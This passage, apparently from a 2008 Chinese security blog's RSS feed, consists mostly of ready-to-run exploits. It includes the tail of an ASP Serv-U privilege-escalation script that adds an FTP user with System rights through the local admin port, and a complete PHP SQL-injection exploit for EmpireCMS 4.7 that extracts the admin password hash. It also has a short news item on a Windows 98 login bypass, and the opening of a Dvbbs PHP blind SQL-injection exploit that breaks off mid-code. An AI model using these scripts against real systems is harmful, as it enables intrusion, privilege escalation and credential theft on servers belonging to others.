2:&lt;br/&gt;&amp;nbsp;&amp;nbsp;privilege=&amp;quot;ReadOnly&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp; case 3:&lt;br/&gt;&amp;nbsp;&amp;nbsp;privilege=&amp;quot;Group&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp; case 4:&lt;br/&gt;&amp;nbsp;&amp;nbsp;privilege=&amp;quot;Domain&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp; case 5:&lt;br/&gt;&amp;nbsp;&amp;nbsp;privilege=&amp;quot;System&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp;end select&lt;br/&gt;&amp;nbsp;&amp;nbsp;if request.Form(&amp;quot;radiobutton&amp;quot;) = &amp;quot;add&amp;quot; Then&lt;br/&gt;&lt;br/&gt;loginuser = &amp;quot;User &amp;quot; &amp;amp; user &amp;amp; vbCrLf&lt;br/&gt;loginpass = &amp;quot;Pass &amp;quot; &amp;amp; pass &amp;amp; vbCrLf&lt;br/&gt;mt = &amp;quot;SITE MAINTENANCE&amp;quot; &amp;amp; vbCrLf&lt;br/&gt;newdomain = &amp;quot;-SETDOMAIN&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-Domain=&amp;quot; &amp;amp; domain &amp;amp;&amp;quot;&amp;#124;0.0.0.0&amp;#124;&amp;quot; &amp;amp; fport &amp;amp; &amp;quot;&amp;#124;-1&amp;#124;1&amp;#124;0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-DynDNSEnable=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;&amp;nbsp;&amp;nbsp;DynIPName=&amp;quot; &amp;amp; vbCrLf&lt;br/&gt;newuser = &amp;quot;-SETUSERSETUP&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-IP=0.0.0.0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-PortNo=&amp;quot; &amp;amp; fport &amp;amp; vbCrLf &amp;amp; &amp;quot;-User=&amp;quot;&amp;amp; fuser &amp;amp; vbCrLf &amp;amp; &amp;quot;-Password=&amp;quot; &amp;amp; fpass &amp;amp; vbCrLf &amp;amp; _&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;quot;-HomeDir=&amp;quot; &amp;amp; fpath &amp;amp; vbCrLf &amp;amp; &amp;quot;-LoginMesFile=&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-Disable=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-RelPaths=1&amp;quot; &amp;amp; vbCrLf &amp;amp; _&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;quot;-NeedSecure=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-HideHidden=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-AlwaysAllowLogin=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-ChangePassword=0&amp;quot; &amp;amp; vbCrLf &amp;amp; _&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;quot;-QuotaEnable=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-MaxUsersLoginPerIP=-1&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-SpeedLimitUp=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-SpeedLimitDown=0&amp;quot; &amp;amp; vbCrLf &amp;amp; _&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;quot;-MaxNrUsers=-1&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-IdleTimeOut=600&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-SessionTimeOut=-1&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-Expire=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-RatioUp=1&amp;quot; &amp;amp; vbCrLf &amp;amp; _&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;quot;-RatioDown=1&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-RatiosCredit=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-QuotaCurrent=0&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-QuotaMaximum=0&amp;quot; &amp;amp; vbCrLf &amp;amp; _&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;quot;-Maintenance=&amp;quot; &amp;amp; privilege&amp;nbsp;&amp;nbsp;&amp;amp; vbCrLf &amp;amp; &amp;quot;-PasswordType=Regular&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot;-Ratios=None&amp;quot; &amp;amp; vbCrLf &amp;amp; &amp;quot; Access=&amp;quot; &amp;amp; fpath &amp;amp;&amp;quot;&amp;#124;RWAMELCDP&amp;quot; &amp;amp; vbCrLf&lt;br/&gt;quit = &amp;quot;QUIT&amp;quot; &amp;amp; vbCrLf&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#039;--------&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#039;On Error Resume Next&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Set xPost = CreateObject(&amp;quot;Microsoft.XMLHTTP&amp;quot;)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;xPost.Open &amp;quot;POST&amp;quot;, &amp;quot;&lt;a href=&quot;http://127.0.0.1:&amp;quot;&amp;amp;&quot; target=&quot;_blank&quot;&gt;http://127.0.0.1:&amp;quot;&amp;amp;&lt;/a&gt; port &amp;amp;&amp;quot;/secdst&amp;quot;,True, &amp;quot;&amp;quot;, &amp;quot;&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;xPost.Send loginuser &amp;amp; loginpass &amp;amp; mt &amp;amp; newdomain &amp;amp; newuser &amp;amp; quit&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Set xPost =nothing&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response.write &amp;quot;&amp;lt;div align=&amp;quot;&amp;amp;chr(34 )&amp;amp;&amp;quot;center&amp;quot;&amp;amp;chr(34 )&amp;amp;&amp;quot;&amp;gt;FTP user &amp;quot;&amp;amp;fuser&amp;amp;&amp;quot;&amp;nbsp;&amp;nbsp;pass &amp;quot;&amp;amp;fpass&amp;amp;&amp;quot; at port &amp;quot;&amp;amp; fport &amp;amp;&amp;quot;&amp;lt;/div&amp;gt;&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp;elseif request.Form(&amp;quot;radiobutton&amp;quot;) = &amp;quot;del&amp;quot; Then&lt;br/&gt;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;loginuser = &amp;quot;User &amp;quot; &amp;amp; user &amp;amp; vbCrLf&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;loginpass = &amp;quot;Pass &amp;quot; &amp;amp; pass &amp;amp; vbCrLf&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;mt = &amp;quot;SITE MAINTENANCE&amp;quot; &amp;amp; vbCrLf&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;deluser =&amp;nbsp;&amp;nbsp;&amp;quot;-DELETEUSER&amp;quot; &amp;amp; vbcrlf &amp;amp; &amp;quot;-IP=0.0.0.0&amp;quot; &amp;amp; vbcrlf &amp;amp; &amp;quot;-PortNo=&amp;quot; &amp;amp; port &amp;amp; vbcrlf &amp;amp; &amp;quot; User=&amp;quot;&amp;amp; fuser &amp;amp; vbcrlf&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;quit = &amp;quot;QUIT&amp;quot; &amp;amp; vbCrLf&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Set xPost3 = CreateObject(&amp;quot;MSXML2.XMLHTTP&amp;quot;)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;xPost3.Open &amp;quot;POST&amp;quot;, &amp;quot;&lt;a href=&quot;http://127.0.0.1:&amp;quot;&amp;amp;&quot; target=&quot;_blank&quot;&gt;http://127.0.0.1:&amp;quot;&amp;amp;&lt;/a&gt; port &amp;amp;&amp;quot;/secdst&amp;quot;, True&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;xPost3.Send loginuser &amp;amp; loginpass &amp;amp; mt &amp;amp; deluser &amp;amp; quit &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Set xPOST3=nothing&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response.write &amp;quot;&amp;lt;div align=&amp;quot;&amp;amp;chr(34 )&amp;amp;&amp;quot;center&amp;quot;&amp;amp;chr(34 )&amp;amp;&amp;quot;&amp;gt;FTP user &amp;quot;&amp;amp;fuser&amp;amp;&amp;quot;&amp;nbsp;&amp;nbsp;pass &amp;quot;&amp;amp;fpass&amp;amp;&amp;quot; at port &amp;quot;&amp;amp; fport &amp;amp;&amp;quot; have deleted&amp;lt;/div&amp;gt;&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp;else&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response.write &amp;quot;&amp;lt;div align=&amp;quot;&amp;amp;chr(34 )&amp;amp;&amp;quot;center&amp;quot;&amp;amp;chr(34 )&amp;amp;&amp;quot;&amp;gt;let&amp;#039;s Start!!!&amp;lt;/div&amp;gt;&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp;end if&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;%&amp;gt;&lt;br/&gt; &lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/servu/&quot; rel=&quot;tag&quot;&gt;servu&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%258F%2590%25E6%259D%2583%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;提权漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c3d00a472c0372bed778f4c5d325fc8d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c3d00a472c0372bed778f4c5d325fc8d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=340e64e88502ca2e9b1dd91bbc740a54&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=340e64e88502ca2e9b1dd91bbc740a54&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c9cbeb92a3ee5dc1b98b599fe032c12e&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c9cbeb92a3ee5dc1b98b599fe032c12e&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=07601e011c6a5510744a82d43d197938&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=07601e011c6a5510744a82d43d197938&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=eb336c6eef8538c04b2d5fff2c85da08&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=eb336c6eef8538c04b2d5fff2c85da08&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=a7453bcdeaf63a30c7f149623362d120&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=a7453bcdeaf63a30c7f149623362d120&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7173f1a7a62c000e3e3c086b568a3eba&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7173f1a7a62c000e3e3c086b568a3eba&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:26:26 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/ServU-bug/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/ServU-bug/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473233/5165305</fs:itemid></item><item><title>Windows 98 登录饶过漏洞,类似以前的输入法漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473234/5165305/1/item.html</link><description>来源：cnBeta&lt;br/&gt;&lt;br/&gt;虽然Windows98使用的人数已经比Linux的桌面用户都要少了,但黑客们捉虫的工作依然在有条不紊地进行中.&lt;br/&gt;一个类似于Windows 2000著名输入法漏洞的Win98登录漏洞刚刚出现,它同样是采用了hlp文件中调用的explorer实现.针对此漏洞,群众们纷纷表示影响不大&lt;br/&gt;&lt;br/&gt;&lt;a href=&quot;http://www.cnbeta.com/upimg/081001/ugmbbc_161426.gif&quot; class=&quot;highslide&quot; onclick=&quot;return hs.expand(this)&quot;&gt;&lt;img src=&quot;http://www.cnbeta.com/upimg/081001/ugmbbc_161426.gif&quot; class=&quot;insertimage&quot; alt=&quot;点击在新窗口中浏览此图片&quot; title=&quot;点击在新窗口中浏览此图片&quot; border=&quot;0&quot;/&gt; &lt;/a&gt;&lt;div class=&quot;highslide-caption&quot; id=&quot;the-caption&quot;&gt;    &lt;a href=&quot;#&quot; onclick=&quot;return hs.previous(this)&quot; class=&quot;control&quot; style=&quot;float:left; display: block&quot;&gt;&lt;img src=&quot;plugin/highslide/graphics/prev.png&quot; title=&quot;上一个&quot; border=&quot;0&quot;&gt;&lt;/a&gt;	&lt;a href=&quot;#&quot; onclick=&quot;return hs.next(this)&quot; class=&quot;control&quot; style=&quot;float:left; display: block; text-align: right;&quot;&gt;&lt;img src=&quot;plugin/highslide/graphics/next.png&quot; title=&quot;下一个&quot; border=&quot;0&quot;&gt;&lt;/a&gt;    &lt;a href=&quot;#&quot; onclick=&quot;return hs.close(this)&quot; class=&quot;control&quot;&gt;&lt;img src=&quot;plugin/highslide/graphics/close.png&quot; title=&quot;关闭&quot; border=&quot;0&quot;&gt;&lt;/a&gt;    &lt;a href=&quot;#&quot; onclick=&quot;return false&quot; class=&quot;highslide-move control&quot;&gt;&lt;img src=&quot;plugin/highslide/graphics/move.png&quot; title=&quot;移动&quot; border=&quot;0&quot;&gt;&lt;/a&gt;    &lt;div style=&quot;clear:both&quot;&gt;&lt;/div&gt;	&lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/windows/&quot; rel=&quot;tag&quot;&gt;windows&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/98/&quot; rel=&quot;tag&quot;&gt;98&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E7%2599%25BB%25E5%25BD%2595%25E9%25A5%25B6%25E8%25BF%2587%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;登录饶过漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=817cc80134f52b82d847e18043337e58&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=817cc80134f52b82d847e18043337e58&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=58cdaea95cc203917f912d60bd174a6a&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=58cdaea95cc203917f912d60bd174a6a&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=4cfff8fd46c3614df6cbc6208baaf1ea&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=4cfff8fd46c3614df6cbc6208baaf1ea&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=9f23ad1ca20d2467a533e3d32bb91639&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=9f23ad1ca20d2467a533e3d32bb91639&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=29ecf534047fb60387ed5bef201ff1ec&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=29ecf534047fb60387ed5bef201ff1ec&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=33eec514c9b58eef1a991125e89c9cea&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=33eec514c9b58eef1a991125e89c9cea&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=b9aed57d5568c214eb6c1de3a592be8a&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=b9aed57d5568c214eb6c1de3a592be8a&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:19:27 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/Windows-98-Bug/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/Windows-98-Bug/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473234/5165305</fs:itemid></item><item><title>EmpireCMS47 sqlinject</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473235/5165305/1/item.html</link><description>&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;&amp;lt;?php&lt;br/&gt;print_r(&amp;quot;&lt;br/&gt;+------------------------------------------------------------------+&lt;br/&gt;Exploit For EmpireCMS47&lt;br/&gt;Just work as php&amp;gt;=5&amp;amp;mysql&amp;gt;=4.1&lt;br/&gt;BY&amp;nbsp;&amp;nbsp;t00ls.net&lt;br/&gt;+------------------------------------------------------------------+&lt;br/&gt;&amp;quot;);&lt;br/&gt;&lt;br/&gt;if ($argc&amp;lt;3) &amp;#123;&lt;br/&gt;echo &amp;quot;Usage: php &amp;quot;.$argv&amp;#91;0&amp;#93;.&amp;quot; host path &amp;#92;n&amp;quot;;&lt;br/&gt;echo &amp;quot;host:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;target server &amp;#92;n&amp;quot;;&lt;br/&gt;echo &amp;quot;path:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;path to EmpireCMS47&amp;#92;n&amp;quot;;&lt;br/&gt;echo &amp;quot;Example:&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;echo &amp;quot;php &amp;quot;.$argv&amp;#91;0&amp;#93;.&amp;quot; localhost /&amp;#92;n&amp;quot;;&lt;br/&gt;die;&lt;br/&gt;&amp;#125;&lt;br/&gt;$host=$argv&amp;#91;1&amp;#93;;&lt;br/&gt;$path=$argv&amp;#91;2&amp;#93;;&lt;br/&gt;$data = &amp;quot;name=11ttt&amp;amp;email=111&amp;amp;call=&amp;amp;lytext=1111&amp;amp;enews=AddGbook&amp;quot;;&lt;br/&gt;$cmd = &amp;quot;aaaaaaaa&amp;#039;,0,1,&amp;#039;&amp;#039;),(&amp;#039;t00lsxxxx&amp;#039;,&amp;#039;t00lsxxxxx&amp;#039;,&amp;#039;&amp;#039;,&amp;#039;2008-05-28 15:44:17&amp;#039;,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where&lt;br/&gt;&lt;br/&gt;userid=1),&amp;#039;&amp;#039;,1,&amp;#039;1111&amp;#039;,0,0,&amp;#039;&amp;#039;)/*&amp;quot;;&lt;br/&gt;$message = &amp;quot;POST &amp;quot;.$path.&amp;quot;/e/enews/index.php&amp;quot;.&amp;quot; HTTP/1.1&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;Referer: &lt;a href=&quot;http://&amp;quot;.$host.$path.&amp;quot;/e/tool/gbook/?bid=1&amp;#92;r&amp;#92;n&amp;quot;;&quot; target=&quot;_blank&quot;&gt;http://&amp;quot;.$host.$path.&amp;quot;/e/tool/gbook/?bid=1&amp;#92;r&amp;#92;n&amp;quot;;&lt;/a&gt;&lt;br/&gt;$message .= &amp;quot;Accept-Language: zh-cn&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;Content-Type: application/x-www-form-urlencoded&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;CLIENT-IP: $cmd&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;Host: $host&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;Content-Length: &amp;quot;.strlen($data).&amp;quot;&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;Cookie: ecmsgbookbid=1;&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;Connection: Close&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .= &amp;quot;&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;$message .=$data;&lt;br/&gt;$ock=fsockopen($host,80);&lt;br/&gt;if (!$ock) &amp;#123;&lt;br/&gt;echo &amp;#039;No response from &amp;#039;.$host;&lt;br/&gt;die;&lt;br/&gt;&amp;#125;&lt;br/&gt;echo &amp;quot;&amp;#91;+&amp;#93;connected to the site!&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;echo &amp;quot;&amp;#91;+&amp;#93;sending data now……&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;fputs($ock,$message);&lt;br/&gt;@$resp =&amp;#039;&amp;#039;;&lt;br/&gt;while ($ock &amp;amp;&amp;amp; !feof($ock))&lt;br/&gt;$resp .= fread($ock, 1024);&lt;br/&gt;&lt;br/&gt;echo $resp;&lt;br/&gt;&lt;br/&gt;echo &amp;quot;&amp;#91;+&amp;#93;done!&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;echo &amp;quot;&amp;#91;+&amp;#93;go to &lt;a href=&quot;http://$host$path/e/tool/gbook/?bid=1&quot; target=&quot;_blank&quot;&gt;http://$host$path/e/tool/gbook/?bid=1&lt;/a&gt; see the hash,good luck&amp;quot;&lt;br/&gt;?&amp;gt;&lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/empirecms47/&quot; rel=&quot;tag&quot;&gt;empirecms47&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/ecms/&quot; rel=&quot;tag&quot;&gt;ecms&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%25B8%259D%25E5%259B%25BDcms/&quot; rel=&quot;tag&quot;&gt;帝国cms&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%25B3%25A8%25E5%2585%25A5%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;注入漏洞&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/exp/&quot; rel=&quot;tag&quot;&gt;exp&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=0c2d633df00b9d04e1a56dcbb2380dc9&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=0c2d633df00b9d04e1a56dcbb2380dc9&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=effb61fab7d32ae001af9cb9cfa7c4b5&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=effb61fab7d32ae001af9cb9cfa7c4b5&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=093ccbea63af3e30f991f53f0818c194&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=093ccbea63af3e30f991f53f0818c194&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=1637aa28dbf40de093865cf9983ce6d2&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=1637aa28dbf40de093865cf9983ce6d2&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=ee7763981e4382c9792ae9976b8fe3de&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=ee7763981e4382c9792ae9976b8fe3de&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=00c8d53ad3314d81b0e7fe07a5dd5465&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=00c8d53ad3314d81b0e7fe07a5dd5465&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=2d274d4778f37334dd71bbe00f952715&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=2d274d4778f37334dd71bbe00f952715&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:14:42 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/EmpireCMS47-SQL-Injection/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/EmpireCMS47-SQL-Injection/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473235/5165305</fs:itemid></item><item><title>Dvbbs·php Version 2.0++ Blind SQL Injection</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473236/5165305/1/item.html</link><description>&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;&amp;lt;html&amp;gt;&lt;br/&gt;&amp;lt;head&amp;gt;&lt;br/&gt;&amp;lt;title&amp;gt;Dvbbs·php Version 2.0++ Blind SQL Injection Exploit&amp;lt;/title&amp;gt;&lt;br/&gt;&amp;lt;script language=&amp;quot;Javascript&amp;quot; type=&amp;quot;text/javascript&amp;quot;&amp;gt;&lt;br/&gt;/*&lt;br/&gt;----------------------------------------------------------------------------------------------&lt;br/&gt;- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit&amp;nbsp;&amp;nbsp;-&lt;br/&gt;- Info ---------------------------------------------------------------------------------------&lt;br/&gt;- Author: oldjun -----------------------------------------------------------------------------&lt;br/&gt;- Exploit Coded By T00LS.NET -------------------------------------------------------------&lt;br/&gt;- Site: &lt;a href=&quot;http://www.t00ls.net&quot; target=&quot;_blank&quot;&gt;http://www.t00ls.net&lt;/a&gt; ----------------------------------------------------------------&lt;br/&gt;----------------------------------------------------------------------------------------------&lt;br/&gt;*/&lt;br/&gt;&lt;br/&gt;function 